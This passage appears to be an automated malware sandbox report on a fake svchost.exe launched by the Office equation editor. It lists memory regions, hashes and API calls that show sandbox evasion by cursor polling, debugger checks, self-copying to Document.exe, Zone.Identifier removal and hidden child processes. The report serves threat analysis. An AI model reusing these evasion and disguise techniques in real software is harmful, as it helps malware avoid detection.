Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76237a10	1	Fn

Process #4: svchost.exe

153

0

»

Information	Value
ID	#4
File Name	c:\users\aetadzjz\appdata\roaming\svchost.exe
Command Line	"C:\Users\aETAdzjz\AppData\Roaming\svchost.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:02:27, Reason: Child Process
Unmonitor	End Time: 00:02:46, Reason: Self Terminated
Monitor Duration	00:00:19

OS Process Information

»

Information	Value
PID	0xbcc
Parent PID	0xb50 (c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\equation\eqnedt32.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x BD0

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	r	-
locale.nls	0x001a0000	0x00206fff	Memory Mapped File	r	-
private_0x0000000000210000	0x00210000	0x0030ffff	Private Memory	-	-
private_0x0000000000310000	0x00310000	0x0031ffff	Private Memory	rw	-
private_0x0000000000320000	0x00320000	0x00320fff	Private Memory	rwx	-
pagefile_0x0000000000330000	0x00330000	0x00336fff	Pagefile Backed Memory	r	-
private_0x0000000000340000	0x00340000	0x003bffff	Private Memory	rw	-
pagefile_0x00000000003c0000	0x003c0000	0x003c1fff	Pagefile Backed Memory	rw	-
private_0x00000000003d0000	0x003d0000	0x003d0fff	Private Memory	rw	-
private_0x00000000003e0000	0x003e0000	0x003e0fff	Private Memory	rwx	-
private_0x00000000003f0000	0x003f0000	0x003fffff	Private Memory	rw	-
pagefile_0x00000000003f0000	0x003f0000	0x003f6fff	Pagefile Backed Memory	rw	-
private_0x00000000003f0000	0x003f0000	0x003f0fff	Private Memory	rw	-
svchost.exe	0x00400000	0x004b2fff	Memory Mapped File	rwx	... Region Actions Download Dump
pagefile_0x00000000004c0000	0x004c0000	0x00647fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000650000	0x00650000	0x00656fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000650000	0x00650000	0x00650fff	Pagefile Backed Memory	rw	-
private_0x0000000000660000	0x00660000	0x0075ffff	Private Memory	rw	-
pagefile_0x0000000000760000	0x00760000	0x008e0fff	Pagefile Backed Memory	r	-
pagefile_0x00000000008f0000	0x008f0000	0x01ceffff	Pagefile Backed Memory	r	-
private_0x0000000001cf0000	0x01cf0000	0x01d00fff	Private Memory	rw	-
private_0x0000000001e80000	0x01e80000	0x01e8ffff	Private Memory	rw	-
private_0x0000000001e90000	0x01e90000	0x0207ffff	Private Memory	rw	-
pagefile_0x0000000002080000	0x02080000	0x02472fff	Pagefile Backed Memory	r	-
private_0x0000000002480000	0x02480000	0x23daffff	Private Memory	-	-
private_0x0000000002480000	0x02480000	0x0a480fff	Private Memory	rw	-
sortdefault.nls	0x02480000	0x0274efff	Memory Mapped File	r	-
version.dll	0x74ba0000	0x74ba8fff	Memory Mapped File	rwx	-
uxtheme.dll	0x75210000	0x7528ffff	Memory Mapped File	rwx	-
wow64cpu.dll	0x752a0000	0x752a7fff	Memory Mapped File	rwx	-
wow64win.dll	0x752b0000	0x7530bfff	Memory Mapped File	rwx	-
wow64.dll	0x75310000	0x7534efff	Memory Mapped File	rwx	-
comctl32.dll	0x75460000	0x754e3fff	Memory Mapped File	rwx	-
cryptbase.dll	0x75970000	0x7597bfff	Memory Mapped File	rwx	-
sspicli.dll	0x75980000	0x759dffff	Memory Mapped File	rwx	-
sechost.dll	0x759e0000	0x759f8fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75a10000	0x75abbfff	Memory Mapped File	rwx	-
imm32.dll	0x75c00000	0x75c5ffff	Memory Mapped File	rwx	-
shlwapi.dll	0x75c60000	0x75cb6fff	Memory Mapped File	rwx	-
ole32.dll	0x75cf0000	0x75e4bfff	Memory Mapped File	rwx	-
msctf.dll	0x75e50000	0x75f1bfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75f40000	0x75f85fff	Memory Mapped File	rwx	-
usp10.dll	0x75fa0000	0x7603cfff	Memory Mapped File	rwx	-
rpcrt4.dll	0x760d0000	0x761bffff	Memory Mapped File	rwx	-
kernel32.dll	0x76220000	0x7632ffff	Memory Mapped File	rwx	-
advapi32.dll	0x76490000	0x7652ffff	Memory Mapped File	rwx	-
oleaut32.dll	0x76720000	0x767aefff	Memory Mapped File	rwx	-
gdi32.dll	0x76a70000	0x76afffff	Memory Mapped File	rwx	-
shell32.dll	0x76b00000	0x77749fff	Memory Mapped File	rwx	-
comdlg32.dll	0x77780000	0x777fafff	Memory Mapped File	rwx	-
lpk.dll	0x77810000	0x77819fff	Memory Mapped File	rwx	-
user32.dll	0x77820000	0x7791ffff	Memory Mapped File	rwx	-
private_0x0000000077a20000	0x77a20000	0x77b19fff	Private Memory	rwx	-
private_0x0000000077b20000	0x77b20000	0x77c3efff	Private Memory	rwx	-
ntdll.dll	0x77c40000	0x77de8fff	Memory Mapped File	rwx	-
ntdll.dll	0x77e20000	0x77f9ffff	Memory Mapped File	rwx	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-

Created Files

»

Filename	File Size	Hash Values	YARA Match	Actions
C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe	0.00 KB	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 SSDeep: 3::		... File Actions Show Properties
C:\Users\aETAdzjz\AppData\Roaming\svchost.exe	693.00 KB	MD5: 7cd1dbbd8457d59274642c9a6e3e60dd SHA1: 3b34e363b79ae598e50f01e1da1523fbd9c2252d SHA256: 0cc3133bbc266693fc23810fb99e57e99b4d1a110f174970aeea79c66d569ce7 SSDeep: 12288:ohSu1Z/EMlJIkTnz6sDsh+zZzuw1aoSqntqtH4qgSBDeiN2:EHzE2Jvi+17wo9nUVgCDeI2		... File Actions Show Properties Download

Modified Files

»

Filename	File Size	Hash Values	YARA Match	Actions
C:\Users\aETAdzjz\AppData\Roaming\svchost.exe	693.00 KB	MD5: 7cd1dbbd8457d59274642c9a6e3e60dd SHA1: 3b34e363b79ae598e50f01e1da1523fbd9c2252d SHA256: 0cc3133bbc266693fc23810fb99e57e99b4d1a110f174970aeea79c66d569ce7 SSDeep: 12288:ohSu1Z/EMlJIkTnz6sDsh+zZzuw1aoSqntqtH4qgSBDeiN2:EHzE2Jvi+17wo9nUVgCDeI2		... File Actions Show Properties Download

Threads

Thread 0xbd0

153

0

»

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = c:\users\aetadzjz\appdata\roaming\svchost.exe, base_address = 0x400000	1	Fn
Keyboard	Get Info	type = 0, result_out = 4	1	Fn
System	Get Info	type = Operating System	2	Fn
Module	Get Filename	module_name = c:\users\aetadzjz\appdata\roaming\svchost.exe, process_name = c:\users\aetadzjz\appdata\roaming\svchost.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\svchost.exe, size = 261	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\roaming\svchost.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\svchost.exe, size = 261	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Borland\Locales	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Borland\Locales	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	1	Fn
Module	Load	module_name = C:\Users\aETAdzjz\AppData\Roaming\svchost.ENU, base_address = 0x0	1	Fn
Module	Load	module_name = C:\Users\aETAdzjz\AppData\Roaming\svchost.EN, base_address = 0x0	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetDiskFreeSpaceExA, address_out = 0x762b434f	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x76720000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VariantChangeTypeEx, address_out = 0x76724c28	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarNeg, address_out = 0x7679c802	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarNot, address_out = 0x7679ec66	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarAdd, address_out = 0x76745934	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarSub, address_out = 0x7679d332	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarMul, address_out = 0x7679dbd4	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDiv, address_out = 0x7679e405	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarIdiv, address_out = 0x7679f00a	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarMod, address_out = 0x7679f15e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarAnd, address_out = 0x76745a98	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarOr, address_out = 0x7679ecfa	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarXor, address_out = 0x7679ee2e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarCmp, address_out = 0x7673b0dc	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarI4FromStr, address_out = 0x76736fab	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarR4FromStr, address_out = 0x767401a0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarR8FromStr, address_out = 0x7673699e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDateFromStr, address_out = 0x76746ba7	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarCyFromStr, address_out = 0x76766c12	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBoolFromStr, address_out = 0x7673dbd1	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrFromCy, address_out = 0x76747fdc	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrFromDate, address_out = 0x76737a2a	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrFromBool, address_out = 0x76740355	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x77820000	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoA, address_out = 0x77844413	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x77837d2f	1	Fn
Keyboard	Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayMonitors, address_out = 0x7784451a	1	Fn
Module	Get Filename	module_name = c:\users\aetadzjz\appdata\roaming\svchost.exe, process_name = c:\users\aetadzjz\appdata\roaming\svchost.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\svchost.exe, size = 256	1	Fn
Window	Create	window_name = svchost, class_name = TApplication, wndproc_parameter = 0	1	Fn
Window	Set Attribute	window_name = svchost, class_name = TApplication, index = 18446744073709551612, new_long = 3280879	1	Fn
Keyboard	Get Info	type = KB_LOCALE_ID	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = AnimateWindow, address_out = 0x7784b531	1	Fn
Module	Get Handle	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75460000	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = InitializeFlatSB, address_out = 0x7549266f	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = UninitializeFlatSB, address_out = 0x75492542	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollProp, address_out = 0x75491d29	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollProp, address_out = 0x7549238d	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_EnableScrollBar, address_out = 0x754920c9	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_ShowScrollBar, address_out = 0x75491fdb	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollRange, address_out = 0x75491e8d	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollInfo, address_out = 0x75491f0f	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollPos, address_out = 0x75491ccd	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollPos, address_out = 0x7549216d	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollInfo, address_out = 0x754922be	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollRange, address_out = 0x754921e2	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = SetLayeredWindowAttributes, address_out = 0x7785ec88	1	Fn
Module	Get Filename	module_name = C:\Users\aETAdzjz\AppData\Roaming\svchost.EN, process_name = c:\users\aetadzjz\appdata\roaming\svchost.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\svchost.exe, size = 255	1	Fn
Module	Load	module_name = C3taUqjCU7eqAyIdAPzjF1nHWemMrup9L3lp460T2.dll, base_address = 0x0	1	Fn
Module	Get Handle	module_name = mzfjTcKYjWs7xdfL71cu9tmd9Cw, base_address = 0x0	1	Fn
Module	Get Address	module_name = Unknown module name, function = AZMOMSaCRwayip0wWNKiES7U, address_out = 0x0	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x77841218	1	Fn
System	Get Cursor	x_out = 860, y_out = 449	2	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 860, y_out = 449	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 860, y_out = 449	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 215, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 215, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 215, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 215, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 215, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 215, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 215, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 215, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 215, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 215, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 215, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 215, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 215, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 215, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 215, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 430, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 430, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 430, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 430, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 430, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 430, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 430, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 430, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 430, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 430, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 430, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 430, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
System	Get Cursor	x_out = 430, y_out = 475	1	Fn
System	Sleep	duration = 172 milliseconds (0.172 seconds)	1	Fn
Module	Load	module_name = shell32, base_address = 0x76b00000	1	Fn
Module	Load	module_name = user32, base_address = 0x77820000	1	Fn
Module	Load	module_name = advapi32, base_address = 0x76490000	1	Fn
Module	Get Filename	module_name = Unknown module name, process_name = c:\users\aetadzjz\appdata\roaming\svchost.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\svchost.exe, size = 260	1	Fn
Debug	Check for Presence	c:\users\aetadzjz\appdata\roaming\svchost.exe	1	Fn
Debug	Check for Presence	c:\users\aetadzjz\appdata\roaming\svchost.exe	1	Fn
Module	Get Handle	module_name = c:\users\aetadzjz\appdata\roaming\svchost.exe, base_address = 0x400000	1	Fn
Module	Get Filename	module_name = Unknown module name, process_name = c:\users\aetadzjz\appdata\roaming\svchost.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\svchost.exe, size = 260	1	Fn
File	Create Directory	C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT	1	Fn
File	Delete	filename = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe	1	Fn
File	Copy	source_filename = C:\Users\aETAdzjz\AppData\Roaming\svchost.exe, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, type = file_attributes	1	Fn
File	Create	filename = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe:ZoneIdentifier, desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE	1	Fn
File	Write	filename = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe:ZoneIdentifier, size = 0	1	Fn
Module	Get Filename	module_name = Unknown module name, process_name = c:\users\aetadzjz\appdata\roaming\svchost.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\svchost.exe, size = 260	1	Fn
System	Get Time	type = Ticks, time = 193363	1	Fn
Mutex	Create	mutex_name = 1159BD3	1	Fn
Process	Create	process_name = "C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe" 1 "C:\Users\aETAdzjz\AppData\Roaming\svchost.exe" 1159BD3, os_pid = 0x818, creation_flags = CREATE_NORMAL_PRIORITY_CLASS, show_window = SW_HIDE	1	Fn
Process	Create	process_name = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, os_pid = 0x81c, creation_flags = CREATE_NORMAL_PRIORITY_CLASS, show_window = SW_HIDE	1	Fn

Process #6: document.exe

138

0

»

Information	Value
ID	#6
File Name	c:\users\aetadzjz\appdata\roaming\document\document.exe
Command Line	"C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe" 1 "C:\Users\aETAdzjz\AppData\Roaming\svchost.exe" 1159BD3
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:02:45, Reason: Child Process
Unmonitor	End Time: 00:03:14, Reason: Self Terminated
Monitor Duration	00:00:29

OS Process Information

»

Information	Value
PID	0x818
Parent PID	0xbcc (c:\users\aetadzjz\appdata\roaming\svchost.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 820

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	r	-
private_0x00000000001a0000	0x001a0000	0x001a0fff	Private Memory	rwx	-
pagefile_0x00000000001b0000	0x001b0000	0x001b6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000001c0000	0x001c0000	0x001c1fff	Pagefile Backed Memory	rw	-
private_0x00000000001d0000	0x001d0000	0x0024ffff	Private Memory	rw	-
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	rw	-
private_0x0000000000260000	0x00260000	0x00260fff	Private Memory	rwx	-
private_0x0000000000270000	0x00270000	0x0027ffff	Private Memory	rw	-
pagefile_0x0000000000270000	0x00270000	0x00277fff	Pagefile Backed Memory	rw	-
private_0x0000000000280000	0x00280000	0x0037ffff	Private Memory	rw	-
locale.nls	0x00380000	0x003e6fff	Memory Mapped File	r	-
pagefile_0x00000000003f0000	0x003f0000	0x003f7fff	Pagefile Backed Memory	rw	-
document.exe	0x00400000	0x004b2fff	Memory Mapped File	rwx	... Region Actions Download Dump
private_0x00000000004c0000	0x004c0000	0x0052ffff	Private Memory	rw	-
private_0x00000000004c0000	0x004c0000	0x004d0fff	Private Memory	rw	-
private_0x00000000004f0000	0x004f0000	0x0052ffff	Private Memory	rw	-
private_0x0000000000530000	0x00530000	0x0053ffff	Private Memory	rw	-
pagefile_0x0000000000540000	0x00540000	0x0061efff	Pagefile Backed Memory	r	-
private_0x0000000000630000	0x00630000	0x0063ffff	Private Memory	rw	-
pagefile_0x0000000000640000	0x00640000	0x007c7fff	Pagefile Backed Memory	r	-
pagefile_0x00000000007d0000	0x007d0000	0x00950fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000960000	0x00960000	0x01d5ffff	Pagefile Backed Memory	r	-
private_0x0000000001d60000	0x01d60000	0x01e5ffff	Private Memory	-	-
private_0x0000000001e60000	0x01e60000	0x01ffffff	Private Memory	rw	-
staticcache.dat	0x02000000	0x0292ffff	Memory Mapped File	r	-
pagefile_0x0000000002930000	0x02930000	0x02d22fff	Pagefile Backed Memory	r	-
private_0x0000000002d30000	0x02d30000	0x2465ffff	Private Memory	-	-
private_0x0000000002d30000	0x02d30000	0x0ad30fff	Private Memory	rw	-
version.dll	0x74ba0000	0x74ba8fff	Memory Mapped File	rwx	-
dwmapi.dll	0x751f0000	0x75202fff	Memory Mapped File	rwx	-
uxtheme.dll	0x75210000	0x7528ffff	Memory Mapped File	rwx	-
wow64cpu.dll	0x752a0000	0x752a7fff	Memory Mapped File	rwx	-
wow64win.dll	0x752b0000	0x7530bfff	Memory Mapped File	rwx	-
wow64.dll	0x75310000	0x7534efff	Memory Mapped File	rwx	-
comctl32.dll	0x75460000	0x754e3fff	Memory Mapped File	rwx	-
cryptbase.dll	0x75970000	0x7597bfff	Memory Mapped File	rwx	-
sspicli.dll	0x75980000	0x759dffff	Memory Mapped File	rwx	-
sechost.dll	0x759e0000	0x759f8fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75a10000	0x75abbfff	Memory Mapped File	rwx	-
imm32.dll	0x75c00000	0x75c5ffff	Memory Mapped File	rwx	-
shlwapi.dll	0x75c60000	0x75cb6fff	Memory Mapped File	rwx	-
ole32.dll	0x75cf0000	0x75e4bfff	Memory Mapped File	rwx	-
msctf.dll	0x75e50000	0x75f1bfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75f40000	0x75f85fff	Memory Mapped File	rwx	-
usp10.dll	0x75fa0000	0x7603cfff	Memory Mapped File	rwx	-
rpcrt4.dll	0x760d0000	0x761bffff	Memory Mapped File	rwx	-
kernel32.dll	0x76220000	0x7632ffff	Memory Mapped File	rwx	-
advapi32.dll	0x76490000	0x7652ffff	Memory Mapped File	rwx	-
oleaut32.dll	0x76720000	0x767aefff	Memory Mapped File	rwx	-
gdi32.dll	0x76a70000	0x76afffff	Memory Mapped File	rwx	-
shell32.dll	0x76b00000	0x77749fff	Memory Mapped File	rwx	-
comdlg32.dll	0x77780000	0x777fafff	Memory Mapped File	rwx	-
lpk.dll	0x77810000	0x77819fff	Memory Mapped File	rwx	-
user32.dll	0x77820000	0x7791ffff	Memory Mapped File	rwx	-
private_0x0000000077a20000	0x77a20000	0x77b19fff	Private Memory	rwx	-
private_0x0000000077b20000	0x77b20000	0x77c3efff	Private Memory	rwx	-
ntdll.dll	0x77c40000	0x77de8fff	Memory Mapped File	rwx	-
ntdll.dll	0x77e20000	0x77f9ffff	Memory Mapped File	rwx	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
